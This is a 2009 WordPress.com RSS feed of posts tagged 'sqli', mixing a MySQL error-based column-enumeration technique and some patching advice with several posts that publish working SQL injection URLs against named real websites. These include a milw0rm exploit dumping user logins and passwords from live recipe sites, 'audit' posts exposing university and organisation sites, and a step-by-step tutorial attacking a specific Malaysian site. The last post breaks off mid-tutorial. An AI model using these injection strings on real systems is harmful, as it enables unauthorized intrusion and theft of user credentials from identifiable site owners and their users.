<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>sqli &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://en.wordpress.com/tag/sqli/</link>
	<description>Feed of posts on WordPress.com tagged "sqli"</description>
	<pubDate>Mon, 04 Jan 2010 08:06:01 +0000</pubDate>

	<generator>http://en.wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[MySQL table and column names (update 2)]]></title>
<link>http://websec.wordpress.com/2009/11/26/mysql-table-and-column-names-update-2/</link>
<pubDate>Thu, 26 Nov 2009 14:35:08 +0000</pubDate>
<dc:creator>Reiners</dc:creator>
<guid>http://websec.wordpress.com/2009/11/26/mysql-table-and-column-names-update-2/</guid>
<description><![CDATA[Yesterday Paic posted a new comment about another idea for retrieving column names under MySQL. He f]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Yesterday Paic posted a new <a href="http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/#comment-251">comment</a> about another idea for retrieving column names under MySQL. He found a clever way to get column names through MySQL error messages based on a trick I posted on my first article about <a href="http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/#2">MySQL table and column names</a>. Here I used the modular operation &#8216;1&#8242;%&#8217;0&#8242; in an injection after a WHERE clause, to provoke a MySQL error containing the column name used in the WHERE clause. But for now I couldnt expand this to other columns not used in the WHERE clause. Paic found a cool way with &#8220;row subqueries&#8221;. He explains the scenario pretty well, so I will just quote his comment:</p>
<blockquote><p>
I’ve recently found an interesting way of retrieving more column’s name when information_schema table is not accessible. It assume you’ve already found some table’s name.<br />
It is using the 1%0 trick and MySQL subqueries.</p>
<p>I was playing around with sql subqueries when I’ve found something very interesting: “Row Subqueries”</p>
<p>You’d better read this in order to understand what’s next:</p>
<p>http://dev.mysql.com/doc/refman/5.0/en/row-subqueries.html</p>
<p>The hint is “The row constructor and the row returned by the subquery must contain the same number of values.”</p>
<p>Ok, imagine you have the table USER_TABLE. You don’t have any other informations than the table’s name.<br />
The sql query is expecting only one row as result.</p>
<p>Here is our input:<br />
‘ AND (SELECT * FROM USER_TABLE) = (1)&#8211; -</p>
<p>MySQL answer:<br />
“Operand should contain 7 column(s)”</p>
<p>MySQL told us that the table USER_TABLE has 7 columns! That’s great!</p>
<p>Now we can use the UNION and 1%0 to retrieve some column’s name:</p>
<p>The following query shouldn’t give you any error:<br />
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4,5,6,7 LIMIT 1)&#8211; -</p>
<p>Now let’s try with the first colum, simply add %0 to the first column in the UNION:<br />
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)&#8211; -</p>
<p>MySQL answer:<br />
“Column ‘usr_u_id’ cannot be null”</p>
<p>We’ve got the first column name: “usr_u_id”</p>
<p>Then we proceed with the other columns…</p>
<p>Example with the 4th column:<br />
‘ AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4%0,5,6,7 LIMIT 1)&#8211; -</p>
<p>if MySQL doesn’t reply with an error message, this is just because the column can be empty and you won’t be able to get it’s name!</p></blockquote>
<p>So remember: this does only work if the column types have the parameter &#8220;NOT NULL&#8221; and if you know the table name. Additionally, this behavior has been fixed in MySQL 5.1.<br />
Obviously it was a bug because the error message should only appear if you try to insert &#8220;nothing&#8221; in a column marked with &#8220;NOT NULL&#8221; instead of selecting. Btw other mathematical operations like &#8220;1/0&#8243; or just &#8220;null&#8221; does not work, at least I couldn&#8217;t find any other. For &#8216;1&#8242;%&#8217;0&#8242; you can also use mod(&#8216;1&#8242;,&#8217;0&#8242;).</p>
<p>Anyway, another possibility you have when you cant access information_schema or procedure analyse(). Nice <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>update:</strong><br />
you can find some more information <a href="http://sla.ckers.org/forum/read.php?16,32472">here</a>.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Precauciones Básicas para Evitar Ataques Web en ASP]]></title>
<link>http://abtisci.wordpress.com/2009/11/19/precauciones-basicas-para-evitar-ataques-web-en-asp/</link>
<pubDate>Thu, 19 Nov 2009 19:28:48 +0000</pubDate>
<dc:creator>therm000</dc:creator>
<guid>http://abtisci.wordpress.com/2009/11/19/precauciones-basicas-para-evitar-ataques-web-en-asp/</guid>
<description><![CDATA[Escribí un pequeño repaso de como evitar ataques web SQL y JavaScript en ASP. Este lenguaje de progr]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Escribí un <a href="http://mechpoe.blogspot.com/2009/11/precauciones-basicas-para-evitar.html">pequeño repaso</a> de como evitar ataques web SQL y JavaScript en ASP. Este lenguaje de programación ya tiene varios años y cuando salió no eran tan conocidos estos ataques de inyección de código, entonces en general por defecto las aplicaciones web ASP son vulnerables. En ASP .Net ya hay más funciones y conciencia de estos ataques, tal vez escriba otro artículo sobre ASP .Net si alguien lo pide.</p>
<p><a href="http://mechpoe.blogspot.com/2009/11/precauciones-basicas-para-evitar.html" target="_blank">Artículo</a></p>
<div id="content-wrapper">
<div id="main-wrapper">
<div id="main">
<div id="Blog1">
<div><!-- google_ad_section_start(name=default) --></div>
</div>
</div>
</div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hello Secure World - Microsoft Vulnerability Testing Labs (Xss,sqli,csrf,etc..)]]></title>
<link>http://omercakir.wordpress.com/2009/10/22/hello-secure-world-microsoft-vulnerability-testing-labs-xsssqlicsrfetc/</link>
<pubDate>Thu, 22 Oct 2009 16:20:51 +0000</pubDate>
<dc:creator>Ömer Çakır</dc:creator>
<guid>http://omercakir.wordpress.com/2009/10/22/hello-secure-world-microsoft-vulnerability-testing-labs-xsssqlicsrfetc/</guid>
<description><![CDATA[Microsoft has developed a new security offering called HELLOSECUREWORLD.COM. It is a program to enga]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Microsoft has developed a new security offering called HELLOSECUREWORLD.COM. It is a program to engage developers in a fun and exciting way to build knowledge around security in application development. In addition, developers can share information about secure coding for today’s internet-based computing environment. The program features an array of online and offline customer activities ranging from MSDN events, to security virtual labs, to video presentations on a new website.</p>
<p>Includes:</p>
<p>* XSS (Cross Site Scripting)<br />
* SQLi (SQL Injection)<br />
* Canonicalization Attack<br />
* CSRF (Cross Site Request Forgery)<br />
* Integer Overflow/Underflow<br />
* Etc&#8230;</p>
<p>To access the labs go to: <a href="http://www.microsoft.com/click/hellosecureworld/default.mspx" target="_blank">HelloSecureWorld</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[http://www.30196.com/ - SQL Hacked]]></title>
<link>http://nasar00t.wordpress.com/2009/10/18/httpwww-30196-com-sql-hacked/</link>
<pubDate>Sun, 18 Oct 2009 17:40:31 +0000</pubDate>
<dc:creator>st0ken</dc:creator>
<guid>http://nasar00t.wordpress.com/2009/10/18/httpwww-30196-com-sql-hacked/</guid>
<description><![CDATA[possible sql injection on this chinese site: http://www.30196.com/songs.php?id=146%27 visit this sit]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>possible sql injection on this chinese site:</p>
<p><strong>http://www.30196.com/songs.php?id=146%27</strong></p>
<p>visit this site</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PAtch Sql Injection's]]></title>
<link>http://adizonne.wordpress.com/2009/10/09/patch-sql-injections/</link>
<pubDate>Fri, 09 Oct 2009 03:02:10 +0000</pubDate>
<dc:creator>adixersoft</dc:creator>
<guid>http://adizonne.wordpress.com/2009/10/09/patch-sql-injections/</guid>
<description><![CDATA[Sekarang kita coba, untuk ngepatch bug SQLi itu sendiri. Hallo adizonners sorry nich dach lama gak n]]></description>
<content:encoded><![CDATA[Sekarang kita coba, untuk ngepatch bug SQLi itu sendiri. Hallo adizonners sorry nich dach lama gak n]]></content:encoded>
</item>
<item>
<title><![CDATA[sql injection]]></title>
<link>http://coolkidz1412.wordpress.com/2009/08/20/sql-injection/</link>
<pubDate>Thu, 20 Aug 2009 11:07:04 +0000</pubDate>
<dc:creator>coolkidz1412</dc:creator>
<guid>http://coolkidz1412.wordpress.com/2009/08/20/sql-injection/</guid>
<description><![CDATA[Wokeyyy, pertama-tama alias the first&#8230; I&#8217;ll terangin ke loe ttg pengertian SQL injection]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Wokeyyy,</p>
<p>pertama-tama alias the first&#8230;</p>
<p>I&#8217;ll terangin ke loe ttg pengertian SQL injection dulu,,(ibarat bayi lahir gag mungkin langsung jalan khan??bagi newbie2=&#62;termasuk gw,, psen gw cuma satu,, di dunia ni gag da yg instan,, smuanya btuh proses,, so baca dulu pengertian dasarnya ttg SQL injection yg bkal g jelasin stelah kalimat ini).</p>
<p><strong>SQL injction (Injeksi SQL)</strong> adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.</p>
<p>Gimana?? dah dapet gambaran lom??</p>
<p>Masih gag jelas yeh??Sorry, thu td CoPas dr wiki,,^_^</p>
<p>Gni neh intinye&#8230;</p>
<p>SQLi thu teknik nyelipin script query SQL dengan memanfaatkan celah keamanan pada database yg di pakai suatu site dan kelemahan(vurln) pada suatu site,celah ni bisa ada thu di sebabkan oleh si pembuat site yang kurang teliti noh ngefilter inputan2 pada form maupun url sitenya,,</p>
<p>okey, cuma thu deh yang bs gw jelasin about SQLi,,</p>
<p>next&#62;&#62; Gw kan jelasin langkah2 SQLi yang sumbernya berdasarkan pengalaman gw,,</p>
<p>Tp gw jelasinnya di artikel stelah niy,,</p>
<p>ok??!!</p>
<p>(Klo &#8220;OK&#8221; udahan donk baca yang ni!! Pergi sno ke next artikel yg judulnya &#8220;SQLi part 1&#8243;)</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[patch bugs SQLi]]></title>
<link>http://pemalangcyber.wordpress.com/2009/07/13/patch-bugs-sqli/</link>
<pubDate>Mon, 13 Jul 2009 13:43:07 +0000</pubDate>
<dc:creator>admin-is-traitor</dc:creator>
<guid>http://pemalangcyber.wordpress.com/2009/07/13/patch-bugs-sqli/</guid>
<description><![CDATA[ada banyak admin di sebuah website tau kalo di site-nya ada bugs yang namanya SQLi [dibaca:SQL injec]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>ada banyak admin di sebuah website tau kalo di site-nya ada bugs yang namanya SQLi [dibaca:SQL injection] tapi mereka tidak tau bagaimana menutup lubang tersebut. hari ini aku bakal coba menjelaskan sedikit bagaimana menutup bugs terseut.</p>
<p>pertama.. cari file php yang terdapat celah bug / hole SQLi misalnya hole tersebut ada pada: news_detail.php?id_news= itu berarti bug terdapat pada file news_detail.php dan string code bug pada file tersebut ada pada id_news .</p>
<p>Disitu ditemukan bahwa id_news ada pada line 50 untuk menambal lobang tersebut… kita tambahkan filter diatas line tersebut… yaitu line 49 untuk memfilter agar cuma angka saja yg bisa diinputkan di id_news:</p>
<p><strong><em>if (!preg_match(&#8220;/^[0-9]+$/”, $id_news)){ echo “pesan anda“; exit; }</em><br />
</strong><br />
filter agar tidak ada nilai minus diinput id_news: </p>
<p><strong><em>if ($id_news &#60; 0){ echo &#34;pesan anda“; exit; } </em></strong></p>
<p>filter pembatasan length input pada id_news: </p>
<p><strong><em>if (strlen($id_newst)&#62;5){ echo &#8220;pesan anda“; exit; }<br />
</em></strong><br />
* untuk isi dari “pesan anda” bisa diganti dngn script yg laen, bisa dengan “alert” js (javascript) ataupun yg lain, terserah kreativitas anda… <strong>Thanks to: Yogyafree Community, Netheroes Community, xshadow, gblack, xymcrush, paman, indounderground, squall dan semua yang telah membantu dalam memberikan penjelasan tentang patch bug SQLi</strong></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[www.akbid-alhikmah-jpr.ac.id]]></title>
<link>http://pemalangcyber.wordpress.com/2009/07/09/www-akbid-alhikmah-jpr-ac-id/</link>
<pubDate>Wed, 08 Jul 2009 22:32:51 +0000</pubDate>
<dc:creator>admin-is-traitor</dc:creator>
<guid>http://pemalangcyber.wordpress.com/2009/07/09/www-akbid-alhikmah-jpr-ac-id/</guid>
<description><![CDATA[Auditing : www.akbid-alhikmah-jpr.ac.id Date : 09 july 2009 Target : www.akbid-alhikmah-jpr.ac.id Me]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><u>Auditing : <b>www.akbid-alhikmah-jpr.ac.id</b></u><br />
Date : 09 july 2009<br />
Target : <a href="http://www.akbid-alhikmah-jpr.ac.id">www.akbid-alhikmah-jpr.ac.id</a><br />
Method : SQL injection<br />
Contact : launal.kirom@gmail.com</p>
<p>http://www.akbid-alhikmah-jpr.ac.id/artikel.php?id=-8+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables&#8211;</p>
<p><i>Kami telah mengirim email tentang bugs ini 1 minggu yang lalu tetapi tidak ada tanggapan apa-apa. Kami anggap website tersebut sudah tidak terpakai karena tidak ada admin yang mengurusnya. Jadi kita publish bugs tersebut untuk pembelajaran kita semua.</i></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[www.pmn.or.id]]></title>
<link>http://pemalangcyber.wordpress.com/2009/07/08/www-pmn-or-id/</link>
<pubDate>Wed, 08 Jul 2009 22:01:53 +0000</pubDate>
<dc:creator>admin-is-traitor</dc:creator>
<guid>http://pemalangcyber.wordpress.com/2009/07/08/www-pmn-or-id/</guid>
<description><![CDATA[Auditing : www.pmn.or.id Date : 09 july 2009 Target : www.pmn.or.id Method : [** CENCORED **] Contac]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><u>Auditing : <b>www.pmn.or.id</b></u><br />
Date : 09 july 2009<br />
Target : <a href="http://www.pmn.or.id">www.pmn.or.id</a><br />
Method : [** CENCORED **]<br />
Contact : info@pmn.or.id</p>
<p>[** CENCORED **]</p>
<p><i>Pemilik website telah menghubungi. Website dalam pengembangan.</i></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[www.mui.or.id]]></title>
<link>http://pemalangcyber.wordpress.com/2009/07/08/www-mui-or-id/</link>
<pubDate>Wed, 08 Jul 2009 21:56:04 +0000</pubDate>
<dc:creator>admin-is-traitor</dc:creator>
<guid>http://pemalangcyber.wordpress.com/2009/07/08/www-mui-or-id/</guid>
<description><![CDATA[Auditing : www.mui.or.id Date : 09 july 2009 Target : www.mui.or.id Method : SQL injection Contact :]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p><u>Auditing : <b>www.mui.or.id</b></u><br />
Date : 09 july 2009<br />
Target : <a href="http://www.mui.or.id">www.mui.or.id</a><br />
Method : SQL injection<br />
Contact : info@mui.or.id</p>
<p>http://www.mui.or.id/mui_in/fatwa.php?id=-33+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables&#8211;</p>
<p><i>Kami telah mengirim email tentang bugs ini 1 minggu yang lalu tetapi tidak ada tanggapan apa-apa. Kami anggap website tersebut sudah tidak terpakai karena tidak ada admin yang mengurusnya. Jadi kita publish bugs tersebut untuk pembelajaran kita semua.</i></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PHPRecipeBook]]></title>
<link>http://nj3ctor.wordpress.com/2009/07/06/phprecipebook/</link>
<pubDate>Mon, 06 Jul 2009 23:33:21 +0000</pubDate>
<dc:creator>nj3ctor</dc:creator>
<guid>http://nj3ctor.wordpress.com/2009/07/06/phprecipebook/</guid>
<description><![CDATA[Download PHPRecipeBook: http://phprecipebook.sourceforge.net/ spl0itz: http://www.milw0rm.com/exploi]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Download PHPRecipeBook: http://phprecipebook.sourceforge.net/</p>
<p>spl0itz: http://www.milw0rm.com/exploits/8330</p>
<blockquote><p>//////////////////////////////////////////////////////////////////////<br />
////////////////////////////1923TURK &#8211; GRUP///////////////////////////<br />
//////////////////////////////////////////////////////////////////////<br />
*****************************************************<br />
[!] Script : PHPRecipeBook<br />
[!] Verison : 2.39<br />
[!] Download : http://sourceforge.net/projects/phprecipebook/</p>
<p>[-] Bugs : Remote SQL injection Exploit<br />
[-] Dork : inurl:&#8221;/index.php?m=&#8221; &#8220;PHPRecipeBook 2.39&#8243;<br />
[-] Date : 31-03-09(19:33)<br />
[+] Author : DarKdewiL<br />
[+] GroupWeb : www.1923turk.biz<br />
[-] Contact : darkdewil@1923turk.biz</p>
<p>[!] Note : Always use the time you have to finish your work.<br />
  Never leave it to the last minute.<br />
  Once time goes away, it never comes back</p>
<p>*****************************************************<br />
//////////////////////////////////////////////////////////////////////<br />
*****************************************************<br />
[-- Bugs --]</p>
<p>(+)</p>
<p>/index.php?m=recipes&#38;a=search&#38;search=yes&#38;course_id=[SQLEXP]</p>
<p>[-- SQL EXPLOIT --]</p>
<p>Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;<br />
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users&#8211;</p>
<p># milw0rm.com [2009-03-31]</p></blockquote>
<p>Ecco due siti vulnerabili:<br />
http://www.lowcarbrecipes.org/index.php?m=recipes&#38;a=search&#38;search=yes&#38;base_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (nomi utenti)</p>
<p>http://www.lowcarbrecipes.org/index.php?m=recipes&#38;a=search&#38;search=yes&#38;base_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (password utenti)<br />
&#8212;<br />
http://ww.cseworks.com/index.php?m=recipes&#38;a=search&#38;search=yes&#38;course_id=<strong>-7+union+select+1,user_login,3,4,5,6,7+from+security_users&#8211;</strong> (nomi utenti)</p>
<p>http://ww.cseworks.com/index.php?m=recipes&#38;a=search&#38;search=yes&#38;course_id=<strong>-7+union+select+1,user_password,3,4,5,6,7+from+security_users&#8211;</strong> (password utenti)</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sitios de hacking recomendados de junio]]></title>
<link>http://acidous.wordpress.com/2009/06/07/sitios-de-hacking-recomendados-de-junio/</link>
<pubDate>Sun, 07 Jun 2009 06:01:12 +0000</pubDate>
<dc:creator>Acidous</dc:creator>
<guid>http://acidous.wordpress.com/2009/06/07/sitios-de-hacking-recomendados-de-junio/</guid>
<description><![CDATA[Ya es hora de poner sobre este tema algun post en el blog nuevamente y que mejor que recomendando va]]></description>
<content:encoded><![CDATA[Ya es hora de poner sobre este tema algun post en el blog nuevamente y que mejor que recomendando va]]></content:encoded>
</item>
<item>
<title><![CDATA[Statcounter.com]]></title>
<link>http://0security.wordpress.com/2009/05/03/statcountercom/</link>
<pubDate>Sun, 03 May 2009 11:41:57 +0000</pubDate>
<dc:creator>zerosecurity</dc:creator>
<guid>http://0security.wordpress.com/2009/05/03/statcountercom/</guid>
<description><![CDATA[Statcounter is a free yet reliable invisible web tracker, highly configurable hit counter and real-t]]></description>
<content:encoded><![CDATA[Statcounter is a free yet reliable invisible web tracker, highly configurable hit counter and real-t]]></content:encoded>
</item>
<item>
<title><![CDATA[SQLi on Shtplay]]></title>
<link>http://st0ken.wordpress.com/2009/04/30/sqli-on-shtplay/</link>
<pubDate>Thu, 30 Apr 2009 13:45:03 +0000</pubDate>
<dc:creator>st0ken</dc:creator>
<guid>http://st0ken.wordpress.com/2009/04/30/sqli-on-shtplay/</guid>
<description><![CDATA[Site: link SQLi: click here ù_ù]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Site:</p>
<p><a href="http://shtplay.net/">link</a></p>
<p>SQLi:</p>
<p><a href="http://shtplay.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&#38;album=3&#38;image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--">click here ù_ù</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PoC and SQLi Web Malingshit]]></title>
<link>http://embr10.wordpress.com/2009/04/26/poc-and-sqli-web-malingshit/</link>
<pubDate>Sun, 26 Apr 2009 08:56:54 +0000</pubDate>
<dc:creator>embr10</dc:creator>
<guid>http://embr10.wordpress.com/2009/04/26/poc-and-sqli-web-malingshit/</guid>
<description><![CDATA[Apa itu PoC : Proof of concept is a short and/or incomplete realization (or synopsis) of a certain m]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><blockquote><p>Apa itu PoC :</p>
<p>Proof of concept is a short and/or incomplete realization (or synopsis) of a certain method or idea(s) to demonstrate its feasibility, or a demonstration in principle, whose purpose is to verify that some concept or theory is probably capable of exploitation in a useful manner. A related (somewhat synonymous) term is &#8220;proof of principle&#8221;.<br />
atau bahasa indonesianya adalah alur/skema sebuah process secara step by step..</p>
<p>apa itu SQLi</p></blockquote>
<blockquote><p><!--[if gte mso 9]&#62;  Normal 0     false false false  EN-US X-NONE X-NONE              MicrosoftInternetExplorer4              &#60;![endif]--><!--[if gte mso 9]&#62;                                                                                                                                            &#60;![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:0 0 0 0 0 0 0 0 0 0; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]&#62; &#60;!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif]--></p></blockquote>
<blockquote>
<p class="MsoNormal" style="text-align:justify;">SQL injection is a <a title="Code injection" href="http://en.wikipedia.org/wiki/Code_injection"><span style="color:windowtext;text-decoration:none;">code injection</span></a> technique that exploits a <a title="Security vulnerability" href="http://en.wikipedia.org/wiki/Security_vulnerability"><span style="color:windowtext;text-decoration:none;">security vulnerability</span></a> occurring in the <a title="Database" href="http://en.wikipedia.org/wiki/Database"><span style="color:windowtext;text-decoration:none;">database</span></a> layer of an <a title="Application software" href="http://en.wikipedia.org/wiki/Application_software"><span style="color:windowtext;text-decoration:none;">application</span></a>. The vulnerability is present when user input is either incorrectly filtered for <a title="String literal" href="http://en.wikipedia.org/wiki/String_literal"><span style="color:windowtext;text-decoration:none;">string literal</span></a> <a title="Escape sequences" href="http://en.wikipedia.org/wiki/Escape_sequences"><span style="color:windowtext;text-decoration:none;">escape characters</span></a> embedded in <a title="SQL" href="http://en.wikipedia.org/wiki/SQL"><span style="color:windowtext;text-decoration:none;">SQL</span></a> statements or user input is not <a title="Strongly-typed programming language" href="http://en.wikipedia.org/wiki/Strongly-typed_programming_language"><span style="color:windowtext;text-decoration:none;">strongly typed</span></a> and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.</p>
<p><a href="http://en.wikipedia.org/wiki/SQL_injection#cite_note-0"></a></p>
<p>ok.. itu penjelasannya&#8230; lanjut</p>
<p>cari target menggunakan dork google</p></blockquote>
<blockquote><p><code>inurl:news.php?id=10 site:my<br />
</code></p></blockquote>
<blockquote><p>kenapa site:my ?? karena gw benci malingshit,,  cari target terserah kalian&#8230;</p>
<p>misal target gw nih :</p>
<p>target site:</p></blockquote>
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>udahnya kita test apakah target kita bisa di SQLi ato gk??<br />
caranya cukup kasih tanda ( &#8216; ) / petik satu dibelakang url jadinya</p>
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10'</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>klo keluar tulisan error sql berarti webnya bisa di SQLi.</p>
<p>langkah berikutnya kita cari jumlah kolom. caranya make syntak</p>
<dl class="codebox">
<blockquote><dd><code>order by (jumlah kolom)-- </code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>kita terapkan pada site target jadinya</p>
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10 order by 300--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>kalo ada tulisan :</p>
<dl class="codebox">
<blockquote><dd><code>Unknown column '300' in 'order clause' </code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>itu berarti kolomnya kebanyakan kita pake ilmu ngira&#8221; jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga</p>
<p style="text-align:left;">
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10 order by 26--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>error tadi gk keluar.. kita coba lagi make kolom 27</p>
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10 order by 27--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>dan lagi error gk kluar?? kita coba lagi make kolom 28</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=10 order by 28--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..</p>
<p>setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan &#8220;NOMOR AJAIB&#8221; caranya make syntak</p>
<p style="text-align:left;">
<dl class="codebox">
<blockquote><dd><code>depan id kasih tanda ( - )/kurang union select kolom1,2, n</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>penerapan dalam target kita</p>
<dl class="codebox">
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">
<p>maka akan muncul &#8220;NOMOR AJAIB&#8221; itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)</p>
<p>di target kita ngeluarin angka 3 &#38; 11</p>
<p>selanjutnya kita cari versi databasenya.. caranya make syntak</p>
<dl class="codebox">
<blockquote><dd><code>@@Version</code></dd>
</blockquote>
</dl>
<p style="text-align:left;">pada nomor ajaib</p>
<p>penerapan dalam target kita (gw ambil yg 11)</p>
<dl class="codebox">
<dt></dt>
<blockquote><dd><code>http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--</code></dd>
</blockquote>
</dl>
<blockquote><p>muncul versi database<br />
5.0.51b-community-nt</p></blockquote>
<blockquote>
<div>catatan:<br />
